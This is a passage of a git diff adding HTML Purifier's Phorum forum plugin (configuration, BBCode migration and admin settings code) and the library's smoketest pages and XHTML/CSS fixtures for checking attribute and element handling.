make it run last. +priority: run module after * +priority: run hook format after * + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/init-config.php b/lib/htmlpurifier/plugins/phorum/init-config.php new file mode 100644 index 000000000..aa7b15599 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/init-config.php @@ -0,0 +1,28 @@ +<?php + +/** + * Initializes the appropriate configuration from either a PHP file + * or a module configuration value + * @return Instance of HTMLPurifier_Config + */ +function phorum_htmlpurifier_get_config($default = false) { + global $PHORUM; + $config_exists = phorum_htmlpurifier_config_file_exists(); + if ($default || $config_exists || !isset($PHORUM['mod_htmlpurifier']['config'])) { + $config = HTMLPurifier_Config::createDefault(); + include(dirname(__FILE__) . '/config.default.php'); + if ($config_exists) { + include(dirname(__FILE__) . '/config.php'); + } + unset($PHORUM['mod_htmlpurifier']['config']); // unnecessary + } else { + $config = HTMLPurifier_Config::create($PHORUM['mod_htmlpurifier']['config']); + } + return $config; +} + +function phorum_htmlpurifier_config_file_exists() { + return file_exists(dirname(__FILE__) . '/config.php'); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/migrate.bbcode.php b/lib/htmlpurifier/plugins/phorum/migrate.bbcode.php new file mode 100644 index 000000000..24f0ec4a9 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/migrate.bbcode.php @@ -0,0 +1,30 @@ +<?php + +/** + * This file is responsible for migrating from a specific markup language + * like BBCode or Markdown to HTML. WARNING: THIS PROCESS IS NOT REVERSIBLE + * + * Copy this file to 'migrate.php' and it will automatically work for + * BBCode; you may need to tweak this a little to get it to work for other + * languages (usually, just replace the include name and the function name). + * + * If you do NOT want to have any migration performed (for instance, you + * are installing the module on a new forum with no posts), simply remove + * phorum_htmlpurifier_migrate() function. You still need migrate.php + * present, otherwise the module won't work. This ensures that the user + * explicitly says, "No, I do not need to migrate." + */ + +if(!defined("PHORUM")) exit; + +require_once(dirname(__FILE__) . "/../bbcode/bbcode.php"); + +/** + * 'format' hook style function that will be called to convert + * legacy markup into HTML. + */ +function phorum_htmlpurifier_migrate($data) { + return phorum_mod_bbcode_format($data); // bbcode's 'format' hook +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/settings.php b/lib/htmlpurifier/plugins/phorum/settings.php new file mode 100644 index 000000000..8158f0282 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/settings.php @@ -0,0 +1,64 @@ +<?php + +// based off of BBCode's settings file + +/** + * HTML Purifier Phorum mod settings configuration. This provides + * a convenient web-interface for editing the most common HTML Purifier + * configuration directives. You can also specify custom configuration + * by creating a 'config.php' file. + */ + +if(!defined("PHORUM_ADMIN")) exit; + +// error reporting is good! +error_reporting(E_ALL ^ E_NOTICE); + +// load library and other paraphenalia +require_once './include/admin/PhorumInputForm.php'; +require_once (dirname(__FILE__) . '/htmlpurifier/HTMLPurifier.auto.php'); +require_once (dirname(__FILE__) . '/init-config.php'); +require_once (dirname(__FILE__) . '/settings/migrate-sigs-form.php'); +require_once (dirname(__FILE__) . '/settings/migrate-sigs.php'); +require_once (dirname(__FILE__) . '/settings/form.php'); +require_once (dirname(__FILE__) . '/settings/save.php'); + +// define friendly configuration directives. you can expand this array +// to get more web-definable directives +$PHORUM['mod_htmlpurifier']['directives'] = array( + 'URI.Host', // auto-detectable + 'URI.DisableExternal', + 'URI.DisableExternalResources', + 'URI.DisableResources', + 'URI.Munge', + 'URI.HostBlacklist', + 'URI.Disable', + 'HTML.TidyLevel', + 'HTML.Doctype', // auto-detectable + 'HTML.Allowed', + 'AutoFormat', + '-AutoFormat.Custom', + 'AutoFormatParam', + 'Output.TidyFormat', +); + +// lower this setting if you're getting time outs/out of memory +$PHORUM['mod_htmlpurifier']['migrate-sigs-increment'] = 100; + +if (isset($_POST['reset'])) { + unset($PHORUM['mod_htmlpurifier']['config']); +} + +if ($offset = phorum_htmlpurifier_migrate_sigs_check()) { + // migrate signatures + phorum_htmlpurifier_migrate_sigs($offset); +} elseif(!empty($_POST)){ + // save settings + phorum_htmlpurifier_save_settings(); +} + +phorum_htmlpurifier_show_migrate_sigs_form(); +echo '<br />'; +phorum_htmlpurifier_show_form(); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/settings/form.php b/lib/htmlpurifier/plugins/phorum/settings/form.php new file mode 100644 index 000000000..a47a5fae7 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/settings/form.php @@ -0,0 +1,93 @@ +<?php + +function phorum_htmlpurifier_show_form() { + if (phorum_htmlpurifier_config_file_exists()) { + phorum_htmlpurifier_show_config_info(); + return; + } + + global $PHORUM; + + $config = phorum_htmlpurifier_get_config(); + + $frm = new PhorumInputForm ("", "post", "Save"); + $frm->hidden("module", "modsettings"); + $frm->hidden("mod", "htmlpurifier"); // this is the directory name that the Settings file lives in + + if (!empty($error)){ + echo "$error<br />"; + } + + $frm->addbreak("Edit settings for the HTML Purifier module"); + + $frm->addMessage('<p>The box below sets <code>$PHORUM[\'mod_htmlpurifier\'][\'wysiwyg\']</code>. + When checked, contents sent for edit are now purified and the + informative message is disabled. If your WYSIWYG editor is disabled for + admin edits, you can safely keep this unchecked.</p>'); + $frm->addRow('Use WYSIWYG?', $frm->checkbox('wysiwyg', '1', '', $PHORUM['mod_htmlpurifier']['wysiwyg'])); + + $frm->addMessage('<p>The box below sets <code>$PHORUM[\'mod_htmlpurifier\'][\'suppress_message\']</code>, + which removes the big how-to use + HTML Purifier message.</p>'); + $frm->addRow('Suppress information?', $frm->checkbox('suppress_message', '1', '', $PHORUM['mod_htmlpurifier']['suppress_message'])); + + $frm->addMessage('<p>Click on directive links to read what each option does + (links do not open in new windows).</p> + <p>For more flexibility (for instance, you want to edit the full + range of configuration directives), you can create a <tt>config.php</tt> + file in your <tt>mods/htmlpurifier/</tt> directory. Doing so will, + however, make the web configuration interface unavailable.</p>'); + + require_once 'HTMLPurifier/Printer/ConfigForm.php'; + $htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'http://htmlpurifier.org/live/configdoc/plain.html#%s'); + $htmlpurifier_form->setTextareaDimensions(23, 7); // widen a little, since we have space + + $frm->addMessage($htmlpurifier_form->render( + $config, $PHORUM['mod_htmlpurifier']['directives'], false)); + + $frm->addMessage("<strong>Warning: Changing HTML Purifier's configuration will invalidate + the cache. Expect to see a flurry of database activity after you change + any of these settings.</strong>"); + + $frm->addrow('Reset to defaults:', $frm->checkbox("reset", "1", "", false)); + + // hack to include extra styling + echo '<style type="text/css">' . $htmlpurifier_form->getCSS() . ' + .hp-config {margin-left:auto;margin-right:auto;} + </style>'; + $js = $htmlpurifier_form->getJavaScript(); + echo '<script type="text/javascript">'."<!--\n$js\n//-->".'</script>'; + + $frm->show(); +} + +function phorum_htmlpurifier_show_config_info() { + global $PHORUM; + + // update mod_htmlpurifier for housekeeping + phorum_htmlpurifier_commit_settings(); + + // politely tell user how to edit settings manually +?> + <div class="input-form-td-break">How to edit settings for HTML Purifier module</div> + <p> + A <tt>config.php</tt> file exists in your <tt>mods/htmlpurifier/</tt> + directory. This file contains your custom configuration: in order to + change it, please navigate to that file and edit it accordingly. + You can also set <code>$GLOBALS['PHORUM']['mod_htmlpurifier']['wysiwyg']</code> + or <code>$GLOBALS['PHORUM']['mod_htmlpurifier']['suppress_message']</code> + </p> + <p> + To use the web interface, delete <tt>config.php</tt> (or rename it to + <tt>config.php.bak</tt>). + </p> + <p> + <strong>Warning: Changing HTML Purifier's configuration will invalidate + the cache. Expect to see a flurry of database activity after you change + any of these settings.</strong> + </p> +<?php + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/settings/migrate-sigs-form.php b/lib/htmlpurifier/plugins/phorum/settings/migrate-sigs-form.php new file mode 100644 index 000000000..2d63ebe48 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/settings/migrate-sigs-form.php @@ -0,0 +1,22 @@ +<?php + +function phorum_htmlpurifier_show_migrate_sigs_form() { + + $frm = new PhorumInputForm ('', "post", "Migrate"); + $frm->hidden("module", "modsettings"); + $frm->hidden("mod", "htmlpurifier"); + $frm->hidden("migrate-sigs", "1"); + $frm->addbreak("Migrate user signatures to HTML"); + $frm->addMessage('This operation will migrate your users signatures + to HTML. <strong>This process is irreversible and must only be performed once.</strong> + Type in yes in the confirmation field to migrate.'); + if (!file_exists(dirname(__FILE__) . '/../migrate.php')) { + $frm->addMessage('Migration file does not exist, cannot migrate signatures. + Please check <tt>migrate.bbcode.php</tt> on how to create an appropriate file.'); + } else { + $frm->addrow('Confirm:', $frm->text_box("confirmation", "")); + } + $frm->show(); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/settings/migrate-sigs.php b/lib/htmlpurifier/plugins/phorum/settings/migrate-sigs.php new file mode 100644 index 000000000..81c1f0ba9 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/settings/migrate-sigs.php @@ -0,0 +1,77 @@ +<?php + +function phorum_htmlpurifier_migrate_sigs_check() { + global $PHORUM; + $offset = 0; + if (!empty($_POST['migrate-sigs'])) { + if (!isset($_POST['confirmation']) || strtolower($_POST['confirmation']) !== 'yes') { + echo 'Invalid confirmation code.'; + exit; + } + $PHORUM['mod_htmlpurifier']['migrate-sigs'] = true; + phorum_db_update_settings(array("mod_htmlpurifier"=>$PHORUM["mod_htmlpurifier"])); + $offset = 1; + } elseif (!empty($_GET['migrate-sigs']) && $PHORUM['mod_htmlpurifier']['migrate-sigs']) { + $offset = (int) $_GET['migrate-sigs']; + } + return $offset; +} + +function phorum_htmlpurifier_migrate_sigs($offset) { + global $PHORUM; + + if(!$offset) return; // bail out quick if $offset == 0 + + // theoretically, we could get rid of this multi-request + // doo-hickery if safe mode is off + @set_time_limit(0); // attempt to let this run + $increment = $PHORUM['mod_htmlpurifier']['migrate-sigs-increment']; + + require_once(dirname(__FILE__) . '/../migrate.php'); + // migrate signatures + // do this in batches so we don't run out of time/space + $end = $offset + $increment; + $user_ids = array(); + for ($i = $offset; $i < $end; $i++) { + $user_ids[] = $i; + } + $userinfos = phorum_db_user_get_fields($user_ids, 'signature'); + foreach ($userinfos as $i => $user) { + if (empty($user['signature'])) continue; + $sig = $user['signature']; + // perform standard Phorum processing on the sig + $sig = str_replace(array("&","<",">"), array("&","<",">"), $sig); + $sig = preg_replace("/<((http|https|ftp):\/\/[a-z0-9;\/\?:@=\&\$\-_\.\+!*'\(\),~%]+?)>/i", "$1", $sig); + // prepare fake data to pass to migration function + $fake_data = array(array("author"=>"", "email"=>"", "subject"=>"", 'body' => $sig)); + list($fake_message) = phorum_htmlpurifier_migrate($fake_data); + $user['signature'] = $fake_message['body']; + if (!phorum_api_user_save($user)) { + exit('Error while saving user data'); + } + } + unset($userinfos); // free up memory + + // query for highest ID in database + $type = $PHORUM['DBCONFIG']['type']; + $sql = "select MAX(user_id) from {$PHORUM['user_table']}"; + $row = phorum_db_interact(DB_RETURN_ROW, $sql); + $top_id = (int) $row[0]; + + $offset += $increment; + if ($offset > $top_id) { // test for end condition + echo 'Migration finished'; + $PHORUM['mod_htmlpurifier']['migrate-sigs'] = false; + phorum_htmlpurifier_commit_settings(); + return true; + } + $host = $_SERVER['HTTP_HOST']; + $uri = rtrim(dirname($_SERVER['PHP_SELF']), '/\\'); + $extra = 'admin.php?module=modsettings&mod=htmlpurifier&migrate-sigs=' . $offset; + // relies on output buffering to work + header("Location: http://$host$uri/$extra"); + exit; + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/settings/save.php b/lib/htmlpurifier/plugins/phorum/settings/save.php new file mode 100644 index 000000000..7dbb767d0 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/settings/save.php @@ -0,0 +1,27 @@ +<?php + +function phorum_htmlpurifier_save_settings() { + global $PHORUM; + if (phorum_htmlpurifier_config_file_exists()) { + echo "Cannot update settings, <code>mods/htmlpurifier/config.php</code> already exists. To change + settings, edit that file. To use the web form, delete that file.<br />"; + } else { + $config = phorum_htmlpurifier_get_config(true); + if (!isset($_POST['reset'])) $config->mergeArrayFromForm($_POST, 'config', $PHORUM['mod_htmlpurifier']['directives']); + $PHORUM['mod_htmlpurifier']['config'] = $config->getAll(); + } + $PHORUM['mod_htmlpurifier']['wysiwyg'] = !empty($_POST['wysiwyg']); + $PHORUM['mod_htmlpurifier']['suppress_message'] = !empty($_POST['suppress_message']); + if(!phorum_htmlpurifier_commit_settings()){ + $error="Database error while updating settings."; + } else { + echo "Settings Updated<br />"; + } +} + +function phorum_htmlpurifier_commit_settings() { + global $PHORUM; + return phorum_db_update_settings(array("mod_htmlpurifier"=>$PHORUM["mod_htmlpurifier"])); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/all.php b/lib/htmlpurifier/smoketests/all.php new file mode 100644 index 000000000..507034b93 --- /dev/null +++ b/lib/htmlpurifier/smoketests/all.php @@ -0,0 +1,44 @@ +<?php + +require_once 'common.php'; + +header('Content-type: text/html; charset=UTF-8'); +echo '<?xml version="1.0" encoding="UTF-8" ?>'; + +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> +<head> + <title>HTML Purifier: All Smoketests</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <style type="text/css"> + #content {margin:5em;} + iframe {width:100%;height:30em;} + </style> +</head> +<body> +<h1>HTML Purifier: All Smoketests</h1> +<div id="content"> +<?php + +$dir = './'; +$dh = opendir($dir); +while (false !== ($filename = readdir($dh))) { + if ($filename[0] == '.') continue; + if (strpos($filename, '.php') === false) continue; + if ($filename == 'common.php') continue; + if ($filename == 'all.php') continue; + if ($filename == 'testSchema.php') continue; + ?> + <iframe src="<?php echo escapeHTML($filename); if (isset($_GET['standalone'])) {echo '?standalone';} ?>"></iframe> + <?php +} + +?> +</div> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/attrTransform.php b/lib/htmlpurifier/smoketests/attrTransform.php new file mode 100644 index 000000000..2dfda7f4a --- /dev/null +++ b/lib/htmlpurifier/smoketests/attrTransform.php @@ -0,0 +1,72 @@ +<?php + +require 'common.php'; + +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> +<head> + <title>HTML Purifier Attribute Transformation Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <style type="text/css"> + div.container {position:relative;height:120px;border:1px solid #CCC; + margin-bottom:1em; width:225px; float:left; margin-top:1em; + margin-right:1em;} + h2 {clear:left;margin-bottom:0;} + div.container.legend .test {text-align:center;line-height:100px;} + div.test {width:100px;height:100px;border:1px solid black; + position:absolute;top:10px;overflow:auto;} + div.test.html {left:10px;border-right:none;background:#FCC;} + div.test.css {left:110px;background:#CFC;} + img.marked {border:1px solid #000;background:#FFF;} + table.bright {background-color:#F00;} + hr.short {width:50px;} + </style> +</head> +<body> +<h1>HTML Purifier Attribute Transformation Smoketest</h1> +<div class="container legend"> +<div class="test html"> + HTML +</div> +<div class="test css"> + CSS +</div> +</div> +<?php + +if (version_compare(PHP_VERSION, '5', '<')) exit('<p>Requires PHP 5.</p>'); + +$xml = simplexml_load_file('attrTransform.xml'); + +// attr transform enabled HTML Purifier +$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.Doctype', 'XHTML 1.0 Strict'); +$purifier = new HTMLPurifier($config); + +$title = isset($_GET['title']) ? $_GET['title'] : true; + +foreach ($xml->group as $group) { + echo '<h2>' . $group['title'] . '</h2>'; + foreach ($group->sample as $sample) { + $sample = (string) $sample; +?> +<div class="container"> +<div class="test html"> + <?php echo $sample; ?> +</div> +<div class="test css"> + <?php echo $purifier->purify($sample); ?> +</div> +</div> +<?php + } +} + +?> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/attrTransform.xml b/lib/htmlpurifier/smoketests/attrTransform.xml new file mode 100644 index 000000000..8272f4ac7 --- /dev/null +++ b/lib/htmlpurifier/smoketests/attrTransform.xml @@ -0,0 +1,192 @@ +<?xml version="1.0"?> +<samples> + <group title="menu,dir"> + <sample><![CDATA[<menu><li>menu</li></menu>]]></sample> + <sample><![CDATA[<dir><li>dir</li></dir>]]></sample> + </group> + <group title="font"> + <sample><![CDATA[<font color="red">Red</font>]]></sample> + <sample><![CDATA[<font color="#0000FF">#0000FF</font>]]></sample> + <sample><![CDATA[<font face="Arial">Arial</font>]]></sample> + </group> + <group title="font.size"> + <sample><![CDATA[<font size="-2">-2</font>]]></sample> + <sample><![CDATA[<font size="-1">-1</font>]]></sample> + <sample><![CDATA[<font size="0">0</font>]]></sample> + <sample><![CDATA[<font size="1">1</font>]]></sample> + <sample><![CDATA[<font size="2">2</font>]]></sample> + <sample><![CDATA[<font size="3">3</font>]]></sample> + <sample><![CDATA[<font size="4">4</font>]]></sample> + <sample><![CDATA[<font size="5">5</font>]]></sample> + <sample><![CDATA[<font size="6">6</font>]]></sample> + <sample><![CDATA[<font size="7">7</font>]]></sample> + <sample><![CDATA[<font size="8">8</font>]]></sample> + <sample><![CDATA[<font size="+1">+1</font>]]></sample> + <sample><![CDATA[<font size="+2">+2</font>]]></sample> + <sample><![CDATA[<font size="+3">+3</font>]]></sample> + <sample><![CDATA[<font size="+4">+4</font>]]></sample> + <sample><![CDATA[<font size="+5">+5</font>]]></sample> + </group> + <group title="center"> + <sample><![CDATA[<center>Centered</center>]]></sample> + </group> + <group title="p.align"> + <sample><![CDATA[<p align="left">Left</p>]]></sample> + <sample><![CDATA[<p align="center">Center</p>]]></sample> + <sample><![CDATA[<p align="right">Right</p>]]></sample> + </group> + <group title="table.bgcolor"> + <sample><![CDATA[ + <table bgcolor="black" cellspacing="2" cellpadding="2" border="1"> + <tr bgcolor="red"> + <th bgcolor="green">To</th> + <td bgcolor="blue">Be</td> + </tr> + <tr> + <th bgcolor="green">Or</th> + <td>Not</td> + </tr> + <tr bgcolor="red"> + <th>To</th> + <td>Be</td> + </tr> + </table> + ]]></sample> + <sample><![CDATA[ + <table class="bright" bgcolor="black" cellspacing="2" cellpadding="2" border="1"> + <tr> + <th bgcolor="green">Or</th> + <td>Not</td> + </tr> + <tr bgcolor="blue"> + <th bgcolor="green">To</th> + <td>Be</td> + </tr> + </table> + ]]></sample> + </group> + <group title="img.border"> + <sample><![CDATA[<img src="img.png" alt="I" border="2" />]]></sample> + <sample><![CDATA[<a href="http://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample> + </group> + <group title="td,th,hr.width"> + <sample><![CDATA[ + <table border="1"> + <tr> + <th width="20">x1</th> + <td width="40">x2</td> + </tr> + </table> + ]]></sample> + <sample><![CDATA[ + <table border="1"> + <tr> + <th width="33%">x1</th> + <td width="67%">x2</td> + </tr> + </table> + ]]></sample> + <sample><![CDATA[<hr width="70%" /><hr width="30" />]]></sample> + </group> + <group title="td,th.nowrap"> + <sample><![CDATA[ + <table border="1"> + <tr> + <th>This wants to wrap</th> + <td>really badly yes it does</td> + </tr> + </table> + ]]></sample> + <sample><![CDATA[ + <table border="1"> + <tr> + <th nowrap>This wants to wrap</th> + <td nowrap>really badly yes it does</td> + </tr> + </table> + ]]></sample> + </group> + <group title="td,th.height"> + <sample><![CDATA[<table border="1"><tr><td height="60">tall</td></tr></table>]]></sample> + </group> + <group title="img.vspace,hspace"> + <sample><![CDATA[a<img src="img.png" alt="I" class="marked" hspace="7" />a]]></sample> + <sample><![CDATA[<img src="img.png" alt="I" class="marked" vspace="7" /><br />o]]></sample> + </group> + <group title="hr"> + <sample><![CDATA[<hr size="4" />]]></sample> + <sample><![CDATA[<hr size="50" noshade />]]></sample> + </group> + <group title="br.clear"> + <sample><![CDATA[<img src="img.png" alt="I" align="right" />B<br />A]]></sample> + <sample><![CDATA[<img src="img.png" alt="I" align="right" />B<br clear="right" />A]]></sample> + <sample><![CDATA[<img src="img.png" alt="I" align="right" /><img src="img.png" alt="I" align="left" />B<br />A]]></sample> + <sample><![CDATA[<img src="img.png" alt="I" align="right" /><img src="img.png" alt="I" align="left" />B<br clear="all" />A]]></sample> + </group> + <group title="caption.align"> + <sample><![CDATA[ + <table border="1"> + <caption align="left">Left</caption> + <tr><td>1.1</td><td>1.2</td></tr> + </table> + ]]></sample> + <sample><![CDATA[ + <table border="1"> + <caption align="right">Right</caption> + <tr><td>1.1</td><td>1.2</td></tr> + </table> + ]]></sample> + <sample><![CDATA[ + <table border="1"> + <caption align="top">Top</caption> + <tr><td>1.1</td><td>1.2</td></tr> + </table> + ]]></sample> + <sample><![CDATA[ + <table border="1"> + <caption align="bottom">Bottom</caption> + <tr><td>1.1</td><td>1.2</td></tr> + </table> + ]]></sample> + </group> + <group title="img.align"> + <sample><![CDATA[left<img src="img.png" alt="I" class="marked" align="left" />]]></sample> + <sample><![CDATA[right<img src="img.png" alt="I" class="marked" align="right" />]]></sample> + <sample><![CDATA[o<img src="img.png" alt="I" class="marked" align="top" /> top]]></sample> + <sample><![CDATA[o<img src="img.png" alt="I" class="marked" align="bottom" /> bottom]]></sample> + <sample><![CDATA[o<img src="img.png" alt="I" class="marked" align="middle" /> middle]]></sample> + </group> + <group title="table.align"> + <sample><![CDATA[a<table align="left" class="bright"><tr><td>left</td></tr></table>a]]></sample> + <sample><![CDATA[a<table align="center" class="bright"><tr><td>center</td></tr></table>a]]></sample> + <sample><![CDATA[a<table align="right" class="bright"><tr><td>right</td></tr></table>a]]></sample> + </group> + <group title="hr.align"> + <sample><![CDATA[<hr align="left" class="short" />left]]></sample> + <sample><![CDATA[<hr align="center" class="short" />center]]></sample> + <sample><![CDATA[<hr align="right" class="short" />right]]></sample> + </group> + <group title="ul,ol,li.type"> + <sample><![CDATA[<ul type="disc"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ul type="square"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ul type="circle"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ol type="a"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ol type="A"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ol type="i"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ol type="I"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ol type="1"><li>1</li><li>2</li></ul>]]></sample> + <sample><![CDATA[<ol><li type="a">1</li><li type="I">2</li></ul>]]></sample> + </group> + + + <!-- sample + <group title=""> + <sample><![CDATA[]]></sample> + <sample><![CDATA[]]></sample> + <sample><![CDATA[]]></sample> + </group> + --> +</samples> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/smoketests/basic.php b/lib/htmlpurifier/smoketests/basic.php new file mode 100644 index 000000000..1c361727c --- /dev/null +++ b/lib/htmlpurifier/smoketests/basic.php @@ -0,0 +1,73 @@ +<?php + +require_once 'common.php'; + +// todo : modularize the HTML in to separate files + +$allowed = array( + 'allElements' => true, + 'legacy' => true +); + +$page = isset($_GET['p']) ? $_GET['p'] : false; +if (!isset($allowed[$page])) $page = false; + +$strict = isset($_GET['d']) ? (bool) $_GET['d'] : false; + +echo '<?xml version="1.0" encoding="UTF-8" ?>'; +?> +<?php if ($strict) { ?> +<!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd"> +<?php } else { ?> +<!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<?php } ?> +<html> +<head> + <title>HTML Purifier Basic Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<?php + if ($page) { + if (file_exists("basic/$page.css")) { + ?><link rel="stylesheet" href="basic/<?php echo $page ?>.css" type="text/css" /><?php + } + } +?> +</head> +<body> +<?php + +if ($page) { +?> +<div style="float:right;"><div><?php echo $strict ? 'Strict' : 'Loose'; ?>: +<a href="?d=<?php echo (int) !$strict; ?>&p=<?php echo $page ?>">Swap</a></div> +<a href="http://validator.w3.org/check?uri=referer"><img + src="http://www.w3.org/Icons/valid-xhtml10" + alt="Valid XHTML 1.0 Transitional" height="31" width="88" style="border:0;" /></a> +</div> +<?php + $config = HTMLPurifier_Config::createDefault(); + $config->set('Attr.EnableID', true); + $config->set('HTML.Strict', $strict); + $purifier = new HTMLPurifier($config); + echo $purifier->purify(file_get_contents("basic/$page.html")); +} else { + ?> + <h1>HTML Purifier Basic Smoketest Index</h1> + <ul> + <?php + foreach ($allowed as $val => $b) { + ?><li><a href="?p=<?php echo $val ?>"><?php echo $val ?></a></li><?php + } + ?></ul><?php +} + +?> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/basic/allElements.css b/lib/htmlpurifier/smoketests/basic/allElements.css new file mode 100644 index 000000000..20d7c5f2e --- /dev/null +++ b/lib/htmlpurifier/smoketests/basic/allElements.css @@ -0,0 +1,50 @@ +div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0.1em;} +#core-attributes #core-attributes-id, +#core-attributes .core-attributes-class, +#core-attributes div[title='tooltip'], +#core-attributes div[lang='en'], +#core-attributes div[onclick="alert('foo');"], +#module-text abbr, +#module-text acronym, +#module-text div blockquote, +#module-text blockquote[cite='http://www.example.com'], +#module-text br, +#module-text cite, +#module-text code, +#module-text dfn, +#module-text em, +#module-text h1, +#module-text h2, +#module-text h3, +#module-text h4, +#module-text h5, +#module-text h6, +#module-text kbd, +#module-text p, +#module-text pre, +#module-text span q, +#module-text q[cite='http://www.example.com'], +#module-text samp, +#module-text strong, +#module-text var, +#module-hypertext span a, +#module-hypertext a[accesskey='q'], +#module-hypertext a[charset='UTF-8'], +#module-hypertext a[href='http://www.example.com/'], +#module-hypertext a[hreflang='en'], +#module-hypertext a[rel='nofollow'], +#module-hypertext a[rev='index'], +#module-hypertext a[tabindex='1'], +#module-hypertext a[type='text/plain'], +#module-list dl, +#module-list ul, +#module-list ol, +#module-list li, +#module-list dd, +#module-list dt, +.insert-declarations-above + {background:#008000; margin:0; padding:0.2em;} +#module-text span, #module-text div {padding:0; margin:0.1em;} +#module-list li, #module-list dd, #module-list dt {border:1px solid #FFF;} + +/* vim: et sw=4 sts=4 */ diff --git a/lib/htmlpurifier/smoketests/basic/allElements.html b/lib/htmlpurifier/smoketests/basic/allElements.html new file mode 100644 index 000000000..994c8df46 --- /dev/null +++ b/lib/htmlpurifier/smoketests/basic/allElements.html @@ -0,0 +1,82 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> +<head> + <title>HTML Purifier All Elements Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <link rel="stylesheet" href="allElements.css" type="text/css" /> +</head> +<body> + +<h1>HTML Purifier All Elements Smoketest</h1> + +<p>This is the all elements smoke +test. It is divided by XHTML 1.1 style modules. Make sure +<code>div</code>, <code>span</code> and <code>id</code> are allowed, +otherwise there will be problems.</p> + +<h2>Core attributes</h2> +<div id="core-attributes"> + <div id="core-attributes-id">id</div> + <div class="core-attributes-class">class</div> + <div title="tooltip">title</div> + <div lang="en">lang</div> + <div xml:lang="en">xml:lang (green when lang also present)</div> + <div style="background:#008000">style</div> + <div onclick="alert('foo');">onclick (and other event handlers)</div> +</div> + +<h2>Text module</h2> +<div id="module-text"> + <abbr>abbr</abbr> + <acronym>acronym</acronym> + <div><blockquote>blockquote</blockquote></div> + <blockquote cite="http://www.example.com">blockquote@cite</blockquote> + <br /> + <cite>cite</cite> + <code>code</code> + <dfn>dfn</dfn> + <em>em</em> + <h1>h1</h1> + <h2>h2</h2> + <h3>h3</h3> + <h4>h4</h4> + <h5>h5</h5> + <h6>h6</h6> + <kbd>kbd</kbd> + <p>p</p> + <pre>pre</pre> + <span><q>q</q></span> + <q cite="http://www.example.com">q@cite</q> + <samp>samp</samp> + <strong>strong</strong> + <var>var</var> +</div> + +<h2>Hypertext module</h2> +<div id="module-hypertext"> + <span><a>a</a></span>: + <a accesskey="q">accesskey</a> + <a charset="UTF-8">charset</a> + <a href="http://www.example.com/">href</a> + <a hreflang="en">hreflang</a> + <a rel="nofollow">rel</a> + <a rev="index">rev</a> + <a tabindex="1">tabindex</a> + <a type="text/plain">type</a> +</div> + +<h2>List module</h2> +<div id="module-list"> + <dl><dt>dl dt</dt><dd>dl dd</dd></dl> + <ol><li>ol li</li></ol> + <ul><li>ul li</li></ul> +</div> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/smoketests/basic/legacy.css b/lib/htmlpurifier/smoketests/basic/legacy.css new file mode 100644 index 000000000..fb600e400 --- /dev/null +++ b/lib/htmlpurifier/smoketests/basic/legacy.css @@ -0,0 +1,73 @@ + +center, +dir[compact='compact'], +isindex[prompt='Foo'], +menu[compact='compact'], +s, +u, +strike, + +caption[align='bottom'], +div[align='center'], +dl[compact='compact'], + +h1[align='right'], +h2[align='right'], +h3[align='right'], +h4[align='right'], +h5[align='right'], +h6[align='right'], 